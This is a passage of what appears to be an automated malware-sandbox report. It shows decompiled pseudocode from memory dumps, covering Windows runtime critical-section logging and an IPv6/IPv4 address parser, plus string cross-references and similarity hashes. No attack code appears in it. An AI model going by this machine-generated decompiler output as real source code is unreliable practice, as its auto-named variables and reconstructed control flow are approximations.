                                                              							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                              							_push(_t49);
                                                              							_t50 = _v12;
                                                              							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                              							_push(_t85);
                                                              							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                              							_push( *((intOrPtr*)(_t50 + 0x24)));
                                                              							E01F13F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                              							_t53 =  *_t85;
                                                              							_t93 = _t92 + 0x20;
                                                              							_t67 = _t67 + 1;
                                                              							__eflags = _t53 - 0xffffffff;
                                                              							if(_t53 != 0xffffffff) {
                                                              								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                              								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                              							}
                                                              							__eflags = _t67 - 2;
                                                              							if(_t67 > 2) {
                                                              								__eflags = _t85 - 0x1fa20c0;
                                                              								if(_t85 != 0x1fa20c0) {
                                                              									_t76 = _a4;
                                                              									__eflags = _a4 - _a8;
                                                              									if(__eflags == 0) {
                                                              										E01F4217A(_t71, __eflags, _t85);
                                                              									}
                                                              								}
                                                              							}
                                                              							_push("RTL: Re-Waiting\n");
                                                              							_push(0);
                                                              							_push(0x65);
                                                              							_a8 = _a4;
                                                              							E01F13F92();
                                                              							_t91 = _t93 + 0xc;
                                                              							__eflags =  *0x7ffe0382;
                                                              							if( *0x7ffe0382 != 0) {
                                                              								goto L21;
                                                              							}
                                                              						}
                                                              						goto L36;
                                                              					}
                                                              				} else {
                                                              					return _t40;
                                                              				}
                                                              				L36:
                                                              			}


































                                                              Strings
                                                              • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 01F224BD
                                                              • RTL: Re-Waiting, xrefs: 01F224FA
                                                              • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 01F2248D
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.665945266.0000000001EB0000.00000040.00000001.sdmp, Offset: 01EA0000, based on PE: true
                                                              • Associated: 00000006.00000002.665938551.0000000001EA0000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666041714.0000000001F90000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666052467.0000000001FA0000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666063534.0000000001FA4000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666081748.0000000001FA7000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666114112.0000000001FB0000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666168843.0000000002010000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                              • API String ID: 0-3177188983
                                                              • Opcode ID: 9ccea7f5bb449148fd527f32cfe7821e1ee5d9b4c3fe9322d0f83ca74a6c0d5a
                                                              • Instruction ID: be166d89fa138dcffe0919f3c4a71c7ff1e1083183e4923bd268fc9e0e40773d
                                                              • Opcode Fuzzy Hash: 9ccea7f5bb449148fd527f32cfe7821e1ee5d9b4c3fe9322d0f83ca74a6c0d5a
                                                              • Instruction Fuzzy Hash: 70411870A00215EBDB24DF68CD88FAE7BF8EF88720F108609F6559B2C1D736E9418761
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E01EFFCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                                              				signed int _v8;
                                                              				signed int _v12;
                                                              				signed int _v16;
                                                              				signed int _v20;
                                                              				signed int _v24;
                                                              				signed int _v28;
                                                              				signed int _t105;
                                                              				void* _t110;
                                                              				char _t114;
                                                              				short _t115;
                                                              				void* _t118;
                                                              				signed short* _t119;
                                                              				short _t120;
                                                              				char _t122;
                                                              				void* _t127;
                                                              				void* _t130;
                                                              				signed int _t136;
                                                              				intOrPtr _t143;
                                                              				signed int _t158;
                                                              				signed short* _t164;
                                                              				signed int _t167;
                                                              				void* _t170;
                                                              
                                                              				_t158 = 0;
                                                              				_t164 = _a4;
                                                              				_v20 = 0;
                                                              				_v24 = 0;
                                                              				_v8 = 0;
                                                              				_v12 = 0;
                                                              				_v16 = 0;
                                                              				_v28 = 0;
                                                              				_t136 = 0;
                                                              				while(1) {
                                                              					_t167 =  *_t164 & 0x0000ffff;
                                                              					if(_t167 == _t158) {
                                                              						break;
                                                              					}
                                                              					_t118 = _v20 - _t158;
                                                              					if(_t118 == 0) {
                                                              						if(_t167 == 0x3a) {
                                                              							if(_v12 > _t158 || _v8 > _t158) {
                                                              								break;
                                                              							} else {
                                                              								_t119 =  &(_t164[1]);
                                                              								if( *_t119 != _t167) {
                                                              									break;
                                                              								}
                                                              								_t143 = 2;
                                                              								 *((short*)(_a12 + _t136 * 2)) = 0;
                                                              								_v28 = 1;
                                                              								_v8 = _t143;
                                                              								_t136 = _t136 + 1;
                                                              								L47:
                                                              								_t164 = _t119;
                                                              								_v20 = _t143;
                                                              								L14:
                                                              								if(_v24 == _t158) {
                                                              									L19:
                                                              									_t164 =  &(_t164[1]);
                                                              									_t158 = 0;
                                                              									continue;
                                                              								}
                                                              								if(_v12 == _t158) {
                                                              									if(_v16 > 4) {
                                                              										L29:
                                                              										return 0xc000000d;
                                                              									}
                                                              									_t120 = E01EFEE02(_v24, _t158, 0x10);
                                                              									_t170 = _t170 + 0xc;
                                                              									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                                              									_t136 = _t136 + 1;
                                                              									goto L19;
                                                              								}
                                                              								if(_v16 > 3) {
                                                              									goto L29;
                                                              								}
                                                              								_t122 = E01EFEE02(_v24, _t158, 0xa);
                                                              								_t170 = _t170 + 0xc;
                                                              								if(_t122 > 0xff) {
                                                              									goto L29;
                                                              								}
                                                              								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                                                              								goto L19;
                                                              							}
                                                              						}
                                                              						L21:
                                                              						if(_v8 > 7 || _t167 >= 0x80) {
                                                              							break;
                                                              						} else {
                                                              							if(E01EF685D(_t167, 4) == 0) {
                                                              								if(E01EF685D(_t167, 0x80) != 0) {
                                                              									if(_v12 > 0) {
                                                              										break;
                                                              									}
                                                              									_t127 = 1;
                                                              									_a7 = 1;
                                                              									_v24 = _t164;
                                                              									_v20 = 1;
                                                              									_v16 = 1;
                                                              									L36:
                                                              									if(_v20 == _t127) {
                                                              										goto L19;
                                                              									}
                                                              									_t158 = 0;
                                                              									goto L14;
                                                              								}
                                                              								break;
                                                              							}
                                                              							_a7 = 0;
                                                              							_v24 = _t164;
                                                              							_v20 = 1;
                                                              							_v16 = 1;
                                                              							goto L19;
                                                              						}
                                                              					}
                                                              					_t130 = _t118 - 1;
                                                              					if(_t130 != 0) {
                                                              						if(_t130 == 1) {
                                                              							goto L21;
                                                              						}
                                                              						_t127 = 1;
                                                              						goto L36;
                                                              					}
                                                              					if(_t167 >= 0x80) {
                                                              						L7:
                                                              						if(_t167 == 0x3a) {
                                                              							_t158 = 0;
                                                              							if(_v12 > 0 || _v8 > 6) {
                                                              								break;
                                                              							} else {
                                                              								_t119 =  &(_t164[1]);
                                                              								if( *_t119 != _t167) {
                                                              									_v8 = _v8 + 1;
                                                              									L13:
                                                              									_v20 = _t158;
                                                              									goto L14;
                                                              								}
                                                              								if(_v28 != 0) {
                                                              									break;
                                                              								}
                                                              								_v28 = _v8 + 1;
                                                              								_t143 = 2;
                                                              								_v8 = _v8 + _t143;
                                                              								goto L47;
                                                              							}
                                                              						}
                                                              						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                                              							break;
                                                              						} else {
                                                              							_v12 = _v12 + 1;
                                                              							_t158 = 0;
                                                              							goto L13;
                                                              						}
                                                              					}
                                                              					if(E01EF685D(_t167, 4) != 0) {
                                                              						_v16 = _v16 + 1;
                                                              						goto L19;
                                                              					}
                                                              					if(E01EF685D(_t167, 0x80) != 0) {
                                                              						_v16 = _v16 + 1;
                                                              						if(_v12 > 0) {
                                                              							break;
                                                              						}
                                                              						_a7 = 1;
                                                              						goto L19;
                                                              					}
                                                              					goto L7;
                                                              				}
                                                              				 *_a8 = _t164;
                                                              				if(_v12 != 0) {
                                                              					if(_v12 != 3) {
                                                              						goto L29;
                                                              					}
                                                              					_v8 = _v8 + 1;
                                                              				}
                                                              				if(_v28 != 0 || _v8 == 7) {
                                                              					if(_v20 != 1) {
                                                              						if(_v20 != 2) {
                                                              							goto L29;
                                                              						}
                                                              						 *((short*)(_a12 + _t136 * 2)) = 0;
                                                              						L65:
                                                              						_t105 = _v28;
                                                              						if(_t105 != 0) {
                                                              							_t98 = (_t105 - _v8) * 2; // 0x11
                                                              							E01ED8980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                                                              							_t110 = 8;
                                                              							E01ECDFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                                                              						}
                                                              						return 0;
                                                              					}
                                                              					if(_v12 != 0) {
                                                              						if(_v16 > 3) {
                                                              							goto L29;
                                                              						}
                                                              						_t114 = E01EFEE02(_v24, 0, 0xa);
                                                              						_t170 = _t170 + 0xc;
                                                              						if(_t114 > 0xff) {
                                                              							goto L29;
                                                              						}
                                                              						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                                                              						goto L65;
                                                              					}
                                                              					if(_v16 > 4) {
                                                              						goto L29;
                                                              					}
                                                              					_t115 = E01EFEE02(_v24, 0, 0x10);
                                                              					_t170 = _t170 + 0xc;
                                                              					 *((short*)(_a12 + _t136 * 2)) = _t115;
                                                              					goto L65;
                                                              				} else {
                                                              					goto L29;
                                                              				}
                                                              			}


























                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.665945266.0000000001EB0000.00000040.00000001.sdmp, Offset: 01EA0000, based on PE: true
                                                              • Associated: 00000006.00000002.665938551.0000000001EA0000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666041714.0000000001F90000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666052467.0000000001FA0000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666063534.0000000001FA4000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666081748.0000000001FA7000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666114112.0000000001FB0000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666168843.0000000002010000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: __fassign
                                                              • String ID:
                                                              • API String ID: 3965848254-0
                                                              • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                              • Instruction ID: cfdd61a4e5432f48a130749a65dea49f68c977a7f8904643c89f0ed03c1b110c
                                                              • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                              • Instruction Fuzzy Hash: 3191A232D00256EADF24CF98C8457EEBBB4FF85714F24906EDA11A7292E7315A41CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%